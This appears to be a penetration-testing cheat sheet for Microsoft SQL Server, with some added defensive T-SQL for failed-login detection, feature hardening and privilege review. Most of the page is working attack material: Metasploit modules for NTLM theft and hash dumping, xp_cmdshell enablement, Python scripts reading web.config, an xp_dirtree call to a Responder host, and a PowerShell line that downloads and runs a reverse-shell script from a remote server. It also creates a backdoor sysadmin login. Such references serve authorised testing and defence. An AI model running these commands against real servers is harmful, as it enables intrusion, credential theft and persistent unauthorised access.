1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
Search for exploits/scripts/auxiliary modules that can be helpful to find vulnerabilities in this kind of service:
```bash
searchsploit "microsoft sql server"
nmap --script-help "*ms* and *sql*"
msf> search mssql
```
Information
Default MS-SQL System Tables
master Database : Records all the system-level information for an instance of SQL Server.
msdb Database : Is used by SQL Server Agent for scheduling alerts and jobs.
model Database : Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
Resource Database : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.
If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful: you can lock out accounts if you fail login several times using an existing username.
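Seen from the server side, the failed logins that such guessing produces are the signal a defender looks for. The T-SQL below is an added example (not from the original page): it reads the current SQL Server error log with `xp_readerrorlog`, extracts the login name and client address from each "Login failed for user ..." entry, and reports any login/client pair above a threshold inside a time window. It assumes the default login auditing setting (failed logins are written to the error log); the threshold and window are arbitrary sample values.

```sql
-- Added example (not from the original page): summarise failed logins recorded in the
-- current SQL Server error log, grouped by login name and client address.
-- Assumes the default login auditing setting ("Failed logins only" or "Both"), so each
-- failure appears in the error log as
--   Login failed for user 'name'. Reason: ... [CLIENT: 10.0.0.5]
-- @MinAttempts and @WindowMinutes are arbitrary sample values.
DECLARE @MinAttempts   int = 10;
DECLARE @WindowMinutes int = 60;

CREATE TABLE #errlog (
    LogDate     datetime      NOT NULL,
    ProcessInfo nvarchar(64)  NULL,
    LogText     nvarchar(max) NULL
);

-- xp_readerrorlog: log 0 = current file, type 1 = SQL Server log, filter on 'Login failed'
INSERT INTO #errlog (LogDate, ProcessInfo, LogText)
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed';

;WITH parsed AS (
    SELECT
        LogDate,
        -- text between "user '" and the next "'"  ("user '" is 6 characters)
        SUBSTRING(LogText,
                  CHARINDEX(N'user ''', LogText) + 6,
                  CHARINDEX(N'''', LogText, CHARINDEX(N'user ''', LogText) + 6)
                    - (CHARINDEX(N'user ''', LogText) + 6)) AS LoginName,
        -- text between "[CLIENT: " and "]"  ("[CLIENT: " is 9 characters)
        SUBSTRING(LogText,
                  CHARINDEX(N'[CLIENT: ', LogText) + 9,
                  CHARINDEX(N']', LogText, CHARINDEX(N'[CLIENT: ', LogText))
                    - (CHARINDEX(N'[CLIENT: ', LogText) + 9)) AS ClientAddress
    FROM #errlog
    WHERE LogText LIKE N'Login failed for user ''%'
      AND LogText LIKE N'%[[]CLIENT: %]%'
      AND LogDate >= DATEADD(minute, -@WindowMinutes, GETDATE())
)
SELECT LoginName,
       ClientAddress,
       COUNT(*)     AS Attempts,
       MIN(LogDate) AS FirstSeen,
       MAX(LogDate) AS LastSeen
FROM parsed
GROUP BY LoginName, ClientAddress
HAVING COUNT(*) >= @MinAttempts
ORDER BY Attempts DESC;

DROP TABLE #errlog;
```

A single client cycling through many login names (user enumeration) shows up as many rows sharing one `ClientAddress`; one login name hammered from one client shows up as a single row with a high `Attempts` count. Older log files can be included by repeating the `INSERT ... EXEC` with log numbers 1, 2, ... instead of 0.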
Metasploit
```bash
# Set USERNAME, RHOSTS and PASSWORD
# Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

# Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer # Steal NTLM hash, before executing run Responder

# Info gathering
msf> use admin/mssql/mssql_enum # Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

# Search for interesting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

# Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as # If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner # Escalate from db_owner to sysadmin

# Code execution
msf> use admin/mssql/mssql_exec # Execute commands
msf> use exploit/windows/mssql/mssql_payload # Uploads and execute a payload

# Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
```
```bash
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
```

```sql
-- this turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
-- Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
```
Read this post to find more information about how to abuse this feature.
Read files executing scripts (Python and R)
MSSQL can allow you to execute scripts in Python and/or R. This code is executed by a different user than the one xp_cmdshell uses to execute commands.
Example trying to execute an R "Hello World!" (not working):
Example using configured python to perform several actions:
```sql
-- Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-- Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
-- Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
```
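Both `xp_cmdshell` (enabled in the section above) and `sp_execute_external_script` are gated by server-level configuration switches, and those same switches are what an administrator audits and turns back off. The T-SQL below is an added example, not from the original page: it reports the state of the relevant switches from `sys.configurations` and then shows the hardening counterpart of the enable sequence. It assumes a session with ALTER SETTINGS (sysadmin or serveradmin). On SQL Server 2017 the `external scripts enabled` change only takes effect after a service restart, which is why both `value` and `value_in_use` are shown.

```sql
-- Added example (not from the original page): audit the server-level switches that the
-- command-execution features on this page rely on, then turn them back off.
-- Requires ALTER SETTINGS (sysadmin / serveradmin). Run the first SELECT on its own
-- first; the EXEC block changes configuration.

-- 1. Current state. value = configured, value_in_use = running (they differ when a
--    restart is pending, e.g. 'external scripts enabled' on SQL Server 2016/2017).
SELECT name,
       CAST(value        AS int) AS configured_value,
       CAST(value_in_use AS int) AS running_value,
       CASE WHEN CAST(value_in_use AS int) = 1 THEN 'ENABLED - review' ELSE 'disabled' END AS state
FROM sys.configurations
WHERE name IN (N'xp_cmdshell',
               N'external scripts enabled',   -- sp_execute_external_script (Python/R)
               N'Ole Automation Procedures',
               N'clr enabled',
               N'Ad Hoc Distributed Queries')
ORDER BY name;

-- 2. Hardening: disable the features, then hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'external scripts enabled', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Confirm (external scripts will still show running_value = 1 until the restart)
SELECT name,
       CAST(value        AS int) AS configured_value,
       CAST(value_in_use AS int) AS running_value
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'external scripts enabled', N'Ole Automation Procedures');
```

Disabling the switch removes the capability from everyone, including the sysadmin who can simply re-enable it; the durable control is therefore keeping the sysadmin role small (see the privilege audit further down) and alerting on `sp_configure` changes, for example through SQL Server Audit on the `SERVER_OPERATION_GROUP` action group.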
You can log in to the service using impacket's mssqlclient.py
```bash
mssqlclient.py -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Recommended -windows-auth when you are going to use a domain. Use as domain the NetBIOS name of the machine
# Once logged in you can run queries:
SQL> select @@version;

# Steal NTLM hash
sudo responder -I <interface> # Run that in another console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test'
# Steal the NTLM hash, crack it with john or hashcat

# Try to enable code execution
SQL> enable_xp_cmdshell
# Execute code, two syntaxes, for complex and non-complex cmds
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
```
sqsh
```bash
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
```
Manual
```sql
SELECT name FROM master.dbo.sysdatabases -- Get databases
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; -- Get table names

-- List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;

-- List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date,
       case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status
from sys.server_principals sp
left join sys.sql_logins sl on sp.principal_id = sl.principal_id
where sp.type not in ('G', 'R')
order by sp.name;

-- Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
sp_addsrvrolemember 'hacker', 'sysadmin'
```
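The listing queries above have a defensive counterpart. The T-SQL below is an added example (not from the original page) that enumerates the server-level facts the escalation paths on this page depend on: sysadmin/securityadmin membership, server-level IMPERSONATE grants (the `mssql_escalate_execute_as` path), linked-server login mappings (the `mssql_linkcrawler` path), and logins created or modified recently (the trace a `CREATE LOGIN` like the one above leaves). It is read-only and assumes enough permission to read the catalog views (sysadmin sees everything); `@RecentDays` is an arbitrary sample value.

```sql
-- Added example (not from the original page): review the server-level privileges that
-- the escalation paths on this page depend on. Read-only.
-- @RecentDays is an arbitrary sample value.
DECLARE @RecentDays int = 7;

-- 1. Who holds sysadmin (and securityadmin, which can grant itself the rest)?
SELECT r.name AS server_role, m.name AS member, m.type_desc, m.is_disabled, m.create_date
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name IN (N'sysadmin', N'securityadmin')
ORDER BY r.name, m.name;

-- 2. Server-level IMPERSONATE grants: the grantee can EXECUTE AS the target login.
SELECT grantee.name AS grantee, target.name AS can_impersonate, p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.class_desc = N'SERVER_PRINCIPAL'
  AND p.permission_name = N'IMPERSONATE'
  AND p.state IN ('G', 'W');          -- GRANT / GRANT WITH GRANT OPTION

-- 3. Linked servers and the login used to reach them. A fixed remote login (especially a
--    privileged one) for "all logins" is what link crawling abuses.
SELECT s.name AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       COALESCE(lp.name, N'<all logins>') AS local_login,
       CASE WHEN ll.uses_self_credential = 1 THEN N'self (pass-through)' ELSE ll.remote_name END AS remote_login
FROM sys.servers s
JOIN sys.linked_logins ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- 4. Logins created or modified recently.
SELECT name, type_desc, is_disabled, create_date, modify_date
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')         -- SQL login, Windows login, Windows group
  AND name NOT LIKE N'##%'            -- skip certificate-based system logins
  AND (create_date >= DATEADD(day, -@RecentDays, GETDATE())
       OR modify_date >= DATEADD(day, -@RecentDays, GETDATE()))
ORDER BY modify_date DESC;
```

Query 2 only covers server-scoped impersonation; database-scoped IMPERSONATE grants (the `db_owner`-to-sysadmin path) live in each database's `sys.database_permissions` and have to be checked per database. Results from query 4 are worth comparing against change tickets, since a login that nobody created on purpose is the simplest indicator of the persistence step shown above.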
Post Exploitation
The user running the MSSQL server will have the SeImpersonatePrivilege token enabled.
You will probably be able to escalate to Administrator using this token: Juicy-potato